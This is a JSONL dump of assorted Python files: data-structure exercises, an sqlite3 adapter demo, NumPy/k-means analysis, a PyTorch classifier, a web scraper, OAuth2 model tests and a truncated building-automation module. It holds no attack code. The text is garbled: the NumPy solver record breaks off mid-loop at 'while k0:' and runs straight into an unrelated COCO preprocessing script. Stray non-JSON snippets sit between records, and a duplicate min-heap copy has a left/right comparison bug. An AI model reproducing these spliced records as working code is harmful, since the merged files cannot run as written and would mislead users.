{"seq_id":"391913792","text":"#1 TOP\nn = int(input())\ntop = list(map(int,input().split()))\nstack = []\nresult = []\n\nfor i in range(n):\n    while stack:\n        if stack[-1][1] > top[i]:  # compare the height stored at the top of the stack with top[i]\n            result.append(stack[-1][0] + 1)  # the array is 0-indexed but towers are numbered from 1, so add 1 before appending\n            break\n        stack.pop()  # discard the entry at the top of the stack\n\n    if not stack:\n        result.append(0)  # an empty stack means no tower receives the laser, so append 0\n\n    stack.append([i, top[i]])  # push the current tower onto the stack\n\nfor i in range(n):\n    print(result[i], end=' ')\n\n\n#2 MIN HEAP\nclass minHeap:\n    def __init__(self):\n        self.queue = [None]\n\n    def swap(self, x, y):\n        self.queue[x], self.queue[y] = self.queue[y], self.queue[x]\n\n    def insert(self, n):\n        self.queue.append(n)\n        i = len(self.queue) - 1\n        while i > 1:\n            parent = i // 2\n            if self.queue[i] < self.queue[parent]:\n                self.swap(i, parent)\n                i = parent\n            else: break\n    def delete(self):\n        if len(self.queue) > 1:\n            self.swap(1, len(self.queue)-1)\n            ans = self.queue.pop(len(self.queue)-1)\n            self.minHeapify(1)\n        else: ans = 0\n        return ans\n    def minHeapify(self, i):\n        left = i*2\n        right = i*2 + 1\n        smallest = i\n\n        if left <= len(self.queue)-1 and self.queue[left] < self.queue[smallest]:\n            smallest = left\n        if right <= len(self.queue)-1 and self.queue[right] < self.queue[smallest]:\n            smallest = right\n        if smallest != i:\n            self.swap(i, smallest)\n            self.minHeapify(smallest)\n\nif __name__ == '__main__':\n    num = int(input())\n    heap = minHeap()\n    for i in range(num):\n        x = int(input())\n        if x == 0:\n            print(heap.delete())\n        else:\n            heap.insert(x)","sub_path":"pre_train/week5/w5_2.py","file_name":"w5_2.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"585850947","text":"import sqlite3\n\n\nclass Point(object):\n    def __init__(self, x, y):\n        self.x = x\n        self.y = y\n\n    def __conform__(self, protocol):\n        \"\"\" Convert data type \"\"\"\n        if protocol is sqlite3.PrepareProtocol:\n            return '{};{}'.format(self.x, self.y)\n\n\nclass Point2(object):\n    def __init__(self, x, y):\n        self.x = x\n        self.y = y\n\n\ndef adapt_point(p):\n    return '{};{}'.format(p.x, p.y)\n\n\nconn = sqlite3.connect(':memory:')\nc = conn.cursor()\n\n# Adapt in class.__conform__\np = Point(4.0, -3.2)\nc.execute('SELECT ?', (p,))\nprint(c.fetchall())\n\n# Adapt as a registered callable\nsqlite3.register_adapter(Point2, adapt_point)\np = Point2(4.0, -3.2)\nc.execute('SELECT ?', (p,))\nprint(c.fetchall())\n","sub_path":"standard-library/sqlite3/adapter.py","file_name":"adapter.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
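The adapter record above only covers the Python-to-SQLite direction; a companion sketch for reading the values back out with sqlite3.register_converter (the POINT type name and the x;y encoding mirror the record; convert_point and the table are illustrative):

import sqlite3

def convert_point(raw: bytes):
    # reverse the 'x;y' encoding written by the adapter
    x, y = raw.split(b';')
    return float(x.decode()), float(y.decode())

sqlite3.register_converter('POINT', convert_point)

conn = sqlite3.connect(':memory:', detect_types=sqlite3.PARSE_DECLTYPES)
cur = conn.cursor()
cur.execute('CREATE TABLE t (p POINT)')
cur.execute('INSERT INTO t (p) VALUES (?)', ('4.0;-3.2',))
cur.execute('SELECT p FROM t')
print(cur.fetchone())  # ((4.0, -3.2),): the stored text comes back as a tuple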
{"seq_id":"64309635","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 10 00:02:02 2020\n\n@author: ankit\n\"\"\"\n\nimport numpy as np\nimport math\n\n\nA=np.array([0.2,0.1,1,1,0,0.1,4,-1,1,-1,1,-1,60,0,-2,1,1,0,8,4,0,-1,-2,4,700]).reshape(5,5)\nB=np.array([1,2,3,4,5])\n#Xi=np.array([1.0,1.0,1.0,1.0,1.0])\nXi=np.zeros(5)\nx=np.zeros(5)\nTOL=0.01\nN=100\nr=0\n\nk=1\nwhile k0:\n            images.append({'height':height, 'width':width, 'file_name':file_name, 'id':id})\n            image_names.append(file_name) \n    return object_annotations, images, image_names, labels\n\ntrain_object_annotations, train_images, train_image_names, all_labels = get_preprocessed_data(gqa_train_scenegraph)\nvalid_object_annotations, valid_images, valid_image_names, all_labels = get_preprocessed_data(gqa_val_scenegraph, all_labels) \ntrain_object_coco_format_data = {'annotations':train_object_annotations, 'categories':gqa_object_categories, 'images':train_images}\nvalid_object_coco_format_data = {'annotations':valid_object_annotations, 'categories':gqa_object_categories, 'images':valid_images}\n\ndump_dir = gqa_dir+'/data/preprocessed/object_coco_format_data'\nif not os.path.exists(dump_dir):\n    os.mkdir(dump_dir)\npkl.dump(gqa_objects_hierarchy, open(dump_dir+'/hierarchy_names.pkl', 'wb')) \nfw = open(dump_dir+'/category_names.txt','w')\nfor k in gqa_object_categories:\n    fw.write(k['name'].strip()+'\\n')\nfw.close()\nsys.exit(1)\nif not os.path.exists(dump_dir+'/annotations'):\n    os.mkdir(dump_dir+'/annotations')\njson.dump(train_object_coco_format_data, open(dump_dir+'/annotations/train_instances.json', 'w'))\njson.dump(valid_object_coco_format_data, open(dump_dir+'/annotations/valid_instances.json', 'w'))\nfw = open(dump_dir+'/train_images.txt', 'w')\nfor name in train_image_names:\n    fw.write(name.strip()+'\\n')\nfw = open(dump_dir+'/valid_images.txt', 'w')\nfor name in valid_image_names:\n    fw.write(name.strip()+'\\n')\nif not os.path.exists(dump_dir+'/labels'):\n    os.mkdir(dump_dir+'/labels/')\nfor id in all_labels:\n    fw = open(dump_dir+'/labels/'+str(id)+'.txt', 'w')\n    for entry in all_labels[id]:\n        fw.write(entry.strip()+'\\n')\n    fw.close()\n","sub_path":"analysis/get_coco_hierarchical_annotation_format_for_objects.py","file_name":"get_coco_hierarchical_annotation_format_for_objects.py","file_ext":"py","file_size_in_byte":5487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"234234094","text":"import torch\nfrom torchvision import transforms\nfrom torch.autograd import Variable\nimport numpy as np\nfrom PIL import Image\n\n\nclass AangleClassHandle:\n    def __init__(self, model_path, net, gpu_id=None):\n        \"\"\"\n        Initialize the PyTorch model.\n        :param model_path: path to the model (either the parameters alone, or the parameters saved together with the computation graph)\n        :param net: the network computation graph; required when model_path points to a parameters-only checkpoint\n\n        :param gpu_id: which GPU to run on\n        \"\"\"\n        \n        if gpu_id is not None and isinstance(gpu_id, int) and torch.cuda.is_available():\n            self.device = torch.device(\"cuda:{}\".format(gpu_id))\n        else:\n            self.device = torch.device(\"cpu\")\n        self.net = torch.load(model_path, map_location=self.device)\n        print('device:', self.device)\n        \n        self.trans = transforms.Compose([\n            transforms.Resize((48, 196)),\n            transforms.ToTensor(),\n            transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n        \n        if net is not None:\n            # if the graph and the parameters were saved separately, load the parameters here\n            net = net.to(self.device)\n            \n            try:\n                sk = {}\n                for k in self.net:\n                    # strip the 'module.' prefix (len 7) left by DataParallel checkpoints\n                    sk[k[7:]] = self.net[k]\n                \n                net.load_state_dict(sk)\n            except:\n                net.load_state_dict(self.net)\n            \n            self.net = net\n        print('load model')\n        self.net.eval()\n    \n    def predict(self, im):\n        \"\"\"\n        Run inference on a single image.\n        \"\"\"\n        im = Image.fromarray(im).convert(\"RGB\")\n        image = self.trans(im)\n        image = image.to(self.device)\n        image = image.view(1, *image.size())\n        image = Variable(image)\n        preds = self.net(image)\n        preds = torch.softmax(preds, 1)\n        preds = preds.cpu().detach().numpy()\n        preds = np.argmax(preds)\n        return preds\n","sub_path":"backend/ocr_core/angle_class/angle_class.py","file_name":"angle_class.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
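The predict() method in the record above ends with a softmax over the logits followed by an argmax; a small NumPy-only sketch of that final step (softmax here is a hypothetical stand-in for the torch.softmax + np.argmax pair, with made-up logit values):

import numpy as np

def softmax(logits):
    # subtract the max first so the exponentials cannot overflow
    z = logits - logits.max()
    e = np.exp(z)
    return e / e.sum()

logits = np.array([0.2, 2.5, -1.0])
probs = softmax(logits)
print(probs, probs.argmax())  # probabilities sum to 1; index 1 wins here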
{"seq_id":"210086444","text":"# Maan Qraitem\n# CS 251\n# Analysis\n\nimport numpy as np\nfrom scipy import stats\nimport scipy.cluster.vq as vq\nimport data\nimport PCAData\nimport ClusterData\nimport random as rand\nimport math\n\n# return a list of [min, max] pairs, one per header\ndef data_range(headers, data):\n\textracted = data.get_LimitedHeaders(headers)\n\tAllmin = extracted.min(axis = 0)\n\tAllmax = extracted.max(axis = 0)\n\tfinal = [[Allmin[0, i], Allmax[0, i]] for i in range(Allmin.shape[1])]\n\treturn final\n\n# return the mean of each header\ndef mean(headers, data): \n\textracted = data.get_LimitedHeaders(headers)\n\treturn [x[0, 0] for x in np.mean(extracted, axis = 0).T]\n\n# return the standard deviation of each header\ndef stdev(headers, data): \n\textracted = data.get_LimitedHeaders(headers)\n\treturn [x[0, 0] for x in np.std(extracted, axis = 0).T]\n\n# normalize each column separately\ndef normalize_columns_separately(headers, data):\n\textracted = data.get_LimitedHeaders(headers)\n\textracted = extracted - extracted.min(axis = 0)\n\textracted = extracted/(extracted.max(axis = 0))\n\treturn extracted\n\n# normalize the columns together\ndef normalize_columns_together(headers, data):\n\textracted = data.get_LimitedHeaders(headers)\n\textracted = extracted - np.amin(extracted)\n\textracted = np.divide(extracted, np.amax(extracted))\n\treturn extracted\n\n# calculate the median of each header\ndef median(headers, data):\n\textracted = data.get_LimitedHeaders(headers)\n\treturn np.median(extracted, axis = 0) \n\n# calculate the range of each header\ndef get_range(headers, data):\n\textracted = data.get_LimitedHeaders(headers)\n\treturn np.ptp(extracted,axis=0)\n\n# performs linear regression on a single independent variable\ndef single_linear_regression(data_obj, ind_var, dep_var):\n\tX = np.array(data_obj.get_LimitedHeaders([ind_var]))\n\tY = np.array(data_obj.get_LimitedHeaders([dep_var]))\n\tslope, intercept, r_value, p_value, std_err = stats.linregress(X.reshape(X.shape[0]), Y.reshape(X.shape[0]))\t\n\treturn (slope, intercept, r_value, p_value, std_err, X.min(axis = 0), X.max(axis = 0), Y.min(axis = 0), Y.max(axis = 0))\n\n# performs linear regression on multiple independent variables\ndef linear_regression(data_obj, ind, dep):\n\n\ty = data_obj.get_LimitedHeaders([dep])\n\tA = data_obj.get_LimitedHeaders(ind)\n\n\tA = np.column_stack((A, np.ones(A.shape[0])))\n\n\tAAinv = np.linalg.inv(np.dot(A.T, A))\n\n\tx = np.linalg.lstsq(A, y, rcond=None)\n\n\tb = x[0] \n\tN = y.shape[0]\n\tC = b.shape[0]\n\tdf_e = N - C\n\tdf_r = C - 1 \n\terror = y - np.dot(A, b)\n\tsse = np.dot(error.T, error) / df_e\n\tstderr = np.sqrt(np.diagonal(sse[0,0] * AAinv))\n\tt = b.T / stderr\n\tp = 2 * (1 - stats.t.cdf(abs(t), df_e))\n\tr2 = 1 - error.var() / y.var()\n\t\n\treturn (b, sse, r2, t, p)\n\n\n\n# Calculates the PCA for the selected headers.\ndef pca(d, headers, normalize=True):\n\tif normalize:\n\t\tA = normalize_columns_separately(headers, d)\n\n\telse: \n\t\tA = d.get_LimitedHeaders(headers) \n\n\tm = np.mean(A, axis = 0) \n\tD = A - m \n\tU, S, V = np.linalg.svd(D, full_matrices = False)\n\teigenvalues = np.square(S) / (A.shape[0] - 1)\n\tprojected_data = ((V) * (D.T)).T\n\n\treturn PCAData.PCAData(projected_data, V, eigenvalues, m, headers)\n\n\n\n# computes the kmeans clusters with scipy and returns the codebook, codes, and representation error\ndef kmeans_numpy( d, headers, K, whiten = True):\n\n\tA = d.get_LimitedHeaders(headers)\n\tW = vq.whiten(A)\n\n\tcodebook, bookerror = vq.kmeans(W, K) \n\tcodes, error = vq.vq(W, codebook) \n\n\treturn codebook, codes, error\n\n\ndef kmeans_init(A, K):\n\t# Hint: generate a list of indices then shuffle it and pick K\n\t# Hint: Probably want to check for error cases (e.g.\n\t
# data points < K)\n\n\tpickfrom = A[:]\n\tpicks = [] \n\tfinal = np.zeros((K, A.shape[1]))\n\n\tif (A.shape[0] < K):\n\t\tprint(\"Your data doesn't have enough data points\")\n\t\treturn \n\n\twhile len(picks) != K: \n\t\tpick = rand.randint(0, A.shape[0] - 1) \n\t\tif (pick not in picks): \n\t\t\tfinal[len(picks)] = pickfrom[pick, :]\n\t\t\tpicks.append(pick) \n\n\treturn(final)\n\n\n# computes the L2 (Euclidean) distance from each codebook row to A\ndef L2_distance(codebook, A): \n\tdiff = codebook - A\n\tsquared = np.square(diff) \n\tsummed = np.sum(squared, axis = 1)\n\tsquare_root = np.sqrt(summed)\n\treturn square_root\n\n# computes the L1 (Manhattan) distance from each codebook row to A\ndef L1_distance(codebook, A): \n\tdiff = np.abs(codebook - A)\n\tsummed = np.sum(diff, axis = 1)\n\treturn summed\n\n\n\n# computes the mean distance of point i from every point in the same cluster as i\ndef compute_ai(A, Point_index, codes):\n\tindices = [i for i, x in enumerate(codes) if int(x) == int(codes[Point_index])]\n\ta_i = 0 \n\t\n\tfor index in indices:\n\t\ta_i += L2_distance(A[Point_index, :], A[index, :])[0,0]\n\t\n\treturn (a_i/len(indices))\n\n\n# computes the mean distance of point i from every point in the second nearest cluster\ndef compute_bi(A, Point_index, codes, codebook): \n\n\tdistance = L2_distance(codebook, A[Point_index,:]) \n\tmin_val = math.inf\n\tsmallest_index = 0\n\tfor j, row in enumerate(distance): \n\t\tif (row[0] < min_val and j != int(codes[Point_index])):\n\t\t\tmin_val = row[0]\n\t\t\tsmallest_index = j\n\n\tindices = [i for i, x in enumerate(codes) if int(x) == smallest_index]\n\tb_i = 0\n\n\tfor index in indices:\n\t\tb_i += L2_distance(A[Point_index, :], A[index, :])[0,0]\n\treturn (b_i/len(indices))\n\n\n# computes the silhouette average over all data points\ndef silhouette_average(d, headers, codebook, codes):\n\tA = d.get_LimitedHeaders(headers)\n\tN = A.shape[0]\n\tfinal = 0 \n\tfor i in range(N): \n\t\ta_i = compute_ai(A, i, codes)\n\t\tb_i = compute_bi(A, i, codes, codebook)\n\t\tfinal += (b_i - a_i)/(max(b_i, a_i))\n\n\treturn final/N\n\n
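# Aside (illustrative sketch, not part of the original assignment module):
# the per-point loop in kmeans_classify below can be collapsed into a single
# vectorized nearest-centroid assignment using NumPy broadcasting.
def assign_clusters_vectorized(A, codebook):
	# (N, 1, D) - (K, D) broadcasts to (N, K, D); summing over D gives (N, K)
	d = np.sqrt(np.sum(np.square(np.asarray(A)[:, None, :] - np.asarray(codebook)[None, :, :]), axis=2))
	ids = d.argmin(axis=1)
	return ids, d[np.arange(d.shape[0]), ids]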
# Classify data points according to their closest clusters.\ndef kmeans_classify(A, codebook, measure):\n\n\tids = np.zeros((A.shape[0], 1))\n\tdistances = np.zeros((A.shape[0], 1))\n\n\tfor i in range(A.shape[0]): \n\n\t\tif (measure == \"L1\"):\n\t\t\tdistance = L1_distance(codebook, A[i,:])\n\t\t\n\t\telif (measure == \"L2\"):\n\t\t\tdistance = L2_distance(codebook, A[i,:]) \n\n\t\tids[i, 0] = np.argmin(distance)\n\t\tdistances[i, 0] = np.min(distance)\n\n\treturn (ids, distances)\n\n# Given a data matrix A and a set of K initial means, compute the optimal\n# cluster means for the data and an ID and an error for each data point\ndef kmeans_algorithm(A, means, measure):\n\t# set up some useful constants\n\tMIN_CHANGE = 1e-7 # might want to make this an optional argument\n\tMAX_ITERATIONS = 100 # might want to make this an optional argument\n\tD = means.shape[1] # number of dimensions\n\tK = means.shape[0] # number of clusters\n\tN = A.shape[0] # number of data points\n\n\t# iterate no more than MAX_ITERATIONS\n\tfor i in range(MAX_ITERATIONS): \n\n\t\tcodes, distances = kmeans_classify(A, means, measure)\n\n\t\tnewmeans = np.zeros((K, D))\n\t\tcounts = np.zeros((K, 1))\n\n\t\tA = np.array(A)\n\n\t\tfor num in range(N): \n\t\t\tnewmeans[int(codes[num, 0]), :] += A[num,:]\n\t\t\tcounts[int(codes[num, 0]), 0] += 1 \n\n\t\tfor num in range(K): \n\t\t\tif counts[num, 0] != 0:\n\t\t\t\tnewmeans[num] /= counts[num, 0] \n\t\t\telse:\n\t\t\t\t# reseed an empty cluster with a random data point (randint is inclusive on both ends, so subtract 1)\n\t\t\t\tnewmeans[num] = A[rand.randint(0, A.shape[0] - 1), :]\n\n\t\tdiff = np.sum(np.square(means - newmeans))\n\t\tmeans = newmeans\n\t\tif diff < MIN_CHANGE:\n\t\t\tbreak\n\n\tcodes, errors = kmeans_classify( A, means, measure )\n\n\t# return the means, codes, and errors\n\treturn (means, codes, errors)\n\n\ndef kmeans(d, headers, K, measure, whiten=True):\n\t'''Takes in a Data object, a set of headers, and the number of clusters to create\n\tComputes and returns the codebook, codes and representation errors.
\n\t'''\n\n\tA = d.get_LimitedHeaders(headers)\n\t\n\tif whiten: \n\t\tW = vq.whiten(A)\n\telse:\n\t\tW = A \n\n\tcodebook = kmeans_init(W, K) \n\n\tcodebook, codes, errors = kmeans_algorithm(W, codebook, measure) \n\n\treturn ClusterData.ClusterData(d.get_LimitedHeaders(headers), headers, codebook, codes, errors)\n\n ","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":7707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"247108855","text":"import requests\nfrom bs4 import BeautifulSoup\n\nfor page_number in range(1, 6):\n data = requests.get(\"https://series.naver.com/ebook/top100List.nhn?page=\"+str(page_number))\n result = BeautifulSoup(data.text)\n list_book = result.select(\"div.lst_thum_wrap li\")\n for book in list_book:\n name = book.select_one(\"a strong\").text\n writer = book.select_one(\"span.writer\").text\n print(name, writer)\n\n","sub_path":"WEEK3_HW1.py","file_name":"WEEK3_HW1.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"391913792","text":"#1 TOP\nn = int(input())\ntop = list(map(int,input().split()))\nstack = []\nresult = []\n\nfor i in range(n):\n while stack:\n if stack[-1][1] > top[i]: # [-1][1] 이므로 stack 맨 끝쪽에서 1번째 배열에서 1번째 데이터를 top[i]와 비교\n result.append(stack[-1][0] + 1) # 배열은 0번째부터, 수신탑은 1번부터 시작하므로 수를 맞춰주고 result에 데이터 추가하기\n break\n stack.pop() # 배열의 맨 끝 데이터 비우기\n\n if not stack:\n result.append(0) # 스택이 비면 레이저를 수신한 탑이 없다는 뜻이므로 result에 \"0\" 데이터 추가\n\n stack.append([i, top[i]]) # 스택에 현재 신호탑 데이터 추가\n\nfor i in range(n):\n print(result[i], end=' ')\n\n\n#2 MIN HEAP\nclass minHeap:\n def __init__(self):\n self.queue = [None]\n\n def swap(self, x, y):\n self.queue[x], self.queue[y] = self.queue[y], self.queue[x]\n\n def insert(self, n):\n self.queue.append(n)\n i = len(self.queue) - 1\n while i>1:\n parent = i // 2\n if self.queue[i] < self.queue[parent]:\n self.swap(i, parent)\n i = parent\n else: break\n def delete(self):\n if len(self.queue) > 1:\n self.swap(1, len(self.queue)-1)\n ans = self.queue.pop(len(self.queue)-1)\n self.minHeapify(1)\n else: ans = 0\n return ans\n def minHeapify(self, i):\n left = i*2\n right = i*2 + 1\n smallest = i\n\n if left <= len(self.queue)-1 and self.queue[left] < self.queue[smallest]:\n smallest = left\n if right <= len(self.queue)-1 and self.queue[left] < self.queue[smallest]:\n smallest = right\n if smallest != i:\n self.swap(i, smallest)\n self.minHeapify(smallest)\n\nif __name__ == '__main__':\n num = int(input())\n heap = minHeap()\n for i in range(num):\n x = int(input())\n if x == 0:\n print(heap.delete())\n else:\n heap.insert(x)","sub_path":"pre_train/week5/w5_2.py","file_name":"w5_2.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"31879701","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport pytest\nfrom sqlalchemy.exc import IntegrityError\n\nfrom lti.models import OAuth2Credentials\nfrom lti.models import OAuth2AccessToken\n\n\nclass TestOAuth2Credentials(object):\n\n def test_it_persists_the_id_secret_and_server(self, db_session):\n db_session.add(OAuth2Credentials(client_id=\"TEST_ID\",\n client_secret=\"TEST_SECRET\",\n authorization_server=\"TEST_AUTH_SERVER\"))\n\n persisted = db_session.query(OAuth2Credentials).filter_by(client_id=\"TEST_ID\").one()\n assert persisted.client_id == 
\"TEST_ID\"\n assert persisted.client_secret == \"TEST_SECRET\"\n assert persisted.authorization_server == \"TEST_AUTH_SERVER\"\n\n def test_the_access_tokens_are_available_as_the_access_tokens_property(self,\n factories):\n credentials = factories.OAuth2Credentials()\n access_tokens = [\n factories.OAuth2AccessToken(credentials=credentials),\n factories.OAuth2AccessToken(credentials=credentials),\n factories.OAuth2AccessToken(credentials=credentials),\n ]\n\n assert credentials.access_tokens == access_tokens\n\n def test_you_cant_have_two_oauth2_credentials_with_the_same_id(self, db_session):\n db_session.add(OAuth2Credentials(client_id=\"TEST_ID\",\n client_secret=\"FIRST_SECRET\",\n authorization_server=\"FIRST_AUTH_SERVER\"))\n db_session.add(OAuth2Credentials(client_id=\"TEST_ID\",\n client_secret=\"SECOND_SECRET\",\n authorization_server=\"SECOND_AUTH_SERVER\"))\n\n expected_message = ('duplicate key value violates unique constraint '\n '\"pk__oauth2_credentials\"')\n with pytest.raises(IntegrityError, match=expected_message):\n db_session.flush()\n\n def test_you_can_have_two_oauth2_credentials_with_the_same_server(self, db_session):\n # You can have two OAuth2Credential's for the same server in the db,\n # as long as they have different IDs. This might happen if two\n # different admins create two different developer keys for us in the\n # same Canvas instance, for example.\n db_session.add(OAuth2Credentials(client_id=\"FIRST_ID\",\n client_secret=\"FIRST_SECRET\",\n authorization_server=\"TEST_AUTH_SERVER\"))\n db_session.add(OAuth2Credentials(client_id=\"SECOND_ID\",\n client_secret=\"SECOND_SECRET\",\n authorization_server=\"TEST_AUTH_SERVER\"))\n\n db_session.commit()\n\n @pytest.mark.filterwarnings(\"ignore:Column 'oauth2_credentials.client_id' is marked as a member of\")\n def test_id_is_required(self, db_session):\n db_session.add(OAuth2Credentials(client_secret=\"FIRST_SECRET\",\n authorization_server=\"TEST_AUTH_SERVER\"))\n\n with pytest.raises(IntegrityError):\n db_session.flush()\n\n def test_id_cant_be_None(self, db_session):\n db_session.add(OAuth2Credentials(client_id=None,\n client_secret=\"TEST_SECRET\",\n authorization_server=\"TEST_AUTH_SERVER\"))\n\n with pytest.raises(IntegrityError):\n db_session.flush()\n\n def test_client_secret_is_required(self, db_session):\n db_session.add(OAuth2Credentials(client_id=\"TEST_ID\",\n authorization_server=\"TEST_AUTH_SERVER\"))\n\n with pytest.raises(IntegrityError):\n db_session.flush()\n\n def test_client_secret_cant_be_None(self, db_session):\n db_session.add(OAuth2Credentials(client_id=\"TEST_ID\",\n client_secret=None,\n authorization_server=\"TEST_AUTH_SERVER\"))\n\n expected_message = 'null value in column \"client_secret\" violates not-null constraint'\n with pytest.raises(IntegrityError, match=expected_message):\n db_session.flush()\n\n def test_authorization_server_is_required(self, db_session):\n db_session.add(OAuth2Credentials(client_id=\"TEST_ID\", client_secret=\"TEST_SECRET\"))\n\n with pytest.raises(IntegrityError):\n db_session.flush()\n\n def test_authorization_server_cant_be_None(self, db_session):\n db_session.add(OAuth2Credentials(client_id=\"TEST_ID\",\n client_secret=\"TEST_SECRET\",\n authorization_server=None))\n\n expected_message = ('null value in column \"authorization_server\" '\n 'violates not-null constraint')\n with pytest.raises(IntegrityError, match=expected_message):\n db_session.flush()\n\n def test_deleting_an_OAuth2Credentials_deletes_all_its_OAuth2AccessTokens(self,\n db_session,\n 
factories):\n credentials = factories.OAuth2Credentials()\n db_session.add_all([\n factories.OAuth2AccessToken(credentials=credentials),\n factories.OAuth2AccessToken(credentials=credentials),\n factories.OAuth2AccessToken(credentials=credentials),\n ])\n db_session.flush()\n\n db_session.delete(credentials)\n db_session.commit()\n\n assert db_session.query(OAuth2AccessToken).all() == []\n","sub_path":"tests/lti/models/test_oauth2_credentials.py","file_name":"test_oauth2_credentials.py","file_ext":"py","file_size_in_byte":5801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"199835618","text":"###\n### Core module for Digi-Salama Assemblin project.\n### \n###\nfrom client import Client\nfrom datetime import datetime, timedelta\nfrom config import config # configparser\nimport config as CONFIG # access to globals\nfrom glob import glob\nimport input_functions\nimport json\nimport csv\nimport time\nimport threading\nimport os\nimport logging\nfrom algorithms import calculate_setpoint, turn_on_heating\n\nROOM_SETPOINT = \"B4023 Room Setpoint Remote\"\nROOM_TEMPERATURE = \"B4023 Room Temperature\"\nSOLAR_POWER = \"Solar Power External\"\nOUTSIDE_TEMPERATURE = \"Outside Temperature External\"\nAIR_TEMPERATURE = \"B4023 Room Temperature\"\n\n# Core class used to start and control subprocesses:\n# - reading data from FMI\n# - writing temp/solar to REST\n# - reading data from REST\n# - writing setpoint to REST\n# Each subprocess runs in its own thread parallel to others.\nclass Core:\n def __init__(self):\n self._solar_data = None\n self._temperature_data = None\n self._client = Client()\n self._starttime = None\n self._endtime = None\n self._reading_REST = read_REST(self._client, self)\n self._reading_FMI = read_FMI(self)\n self._writing_setpoint = write_setpoint(self._client, self)\n self._writing_data = write_data(self._client, self)\n self._save_temperatures = config.getboolean(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_SAVE_TEMPERATURES, \\\n fallback=CONFIG.GENERAL_SAVE_TEMPERATURES_FALLBACK)\n self._save_temperatures_filename = config.get(CONFIG.GENERAL_CATEGORY, \\\n CONFIG.GENERAL_SAVE_TEMPERATURES_FILENAME, \\\n fallback=CONFIG.GENERAL_SAVE_TEMPERATURES_FILENAME_FALLBACK)\n\n def stop(self):\n self._reading_REST.stop()\n self._reading_FMI.stop()\n self._writing_setpoint.stop()\n self._writing_data.stop()\n trends = config.get(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_TRENDS, \\\n fallback=CONFIG.GENERAL_TRENDS_FALLBACK)\n self._endtime = datetime.now()\n\n # only retrieve trends if the program has ran at least 5 minutes, else might end up with a timeout error.\n if ((self._endtime - self._starttime).total_seconds() > 300 and len(trends) > 0):\n trends = trends.split(\",\")\n self._save_trends(trends)\n\n # Retrieves trends from REST and saves each into its own file\n def _save_trends(self, trends : list):\n logging.info(\"Saving trends: \" + str(trends))\n try:\n trend_data = json.loads(self._client.trends_values(self._starttime, self._endtime, trends))\n for trend in trend_data:\n filename = \"trends_\" + trend['name'] + \".csv\"\n with open(filename, \"w\") as trend_file:\n for value in trend['values']:\n trend_file.write(value['time'] + \",\" + str(value['value']) + \"\\n\")\n except Exception as e:\n logging.error(\"Saving trends error\")\n logging.error(str(e))\n \n\n def set_temperatures(self, temperature_data):\n self._temperature_data = temperature_data\n if self._save_temperatures:\n logging.info(\"Saving temperatures to: \" + 
self._save_temperatures_filename)\n save_temperatures_to_file(self._solar_data, self._temperature_data, self._save_temperatures_filename)\n\n def get_temperatures(self):\n return self._temperature_data\n\n def set_solar(self, solar_data):\n self._solar_data = solar_data\n\n def get_solar(self):\n return self._solar_data\n\n def start(self):\n # not needed for now.. \n #self._client.login()\n\n #\n # Loading parameters for solar data.\n #\n solar_from_file = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_FROM_FILE, \\\n fallback=CONFIG.INPUT_SOLAR_FROM_FILE_FALLBACK)\n solar_ilmanet_autodetect = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_ILMANET_AUTODETECT, \\\n fallback=CONFIG.INPUT_SOLAR_ILMANET_AUTODETECT_FALLBACK)\n \n # from a non-Ilmanet datafile\n if solar_from_file:\n filename = config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_FILENAME, \\\n fallback=CONFIG.INPUT_SOLAR_FILENAME_FALLBACK)\n date_index = int(config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_DATE_COLUMN_INDEX, \\\n fallback=CONFIG.INPUT_SOLAR_DATE_COLUMN_INDEX_FALLBACK))\n time_index = int(config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_TIME_COLUMN_INDEX, \\\n fallback=CONFIG.INPUT_SOLAR_TIME_COLUMN_INDEX_FALLBACK))\n data_index = int(config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_DATA_COLUMN_INDEX, \\\n fallback=CONFIG.INPUT_SOLAR_DATA_COLUMN_INDEX_FALLBACK))\n logging.info(\"Reading solar data from file: \" + filename + \" date index: \" + str(date_index) + \\\n \" time index: \" + str(time_index) + \" data index: \" + \\\n str(data_index))\n self._solar_data = input_functions.load_data_from_file(filename, date_index, time_index, data_index)\n # Ilmanet\n else:\n filename = config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_ILMANET_FILENAME, \\\n fallback=CONFIG.INPUT_SOLAR_ILMANET_FILENAME_FALLBACK)\n if solar_ilmanet_autodetect:\n try:\n # try to find the newest export_solar... 
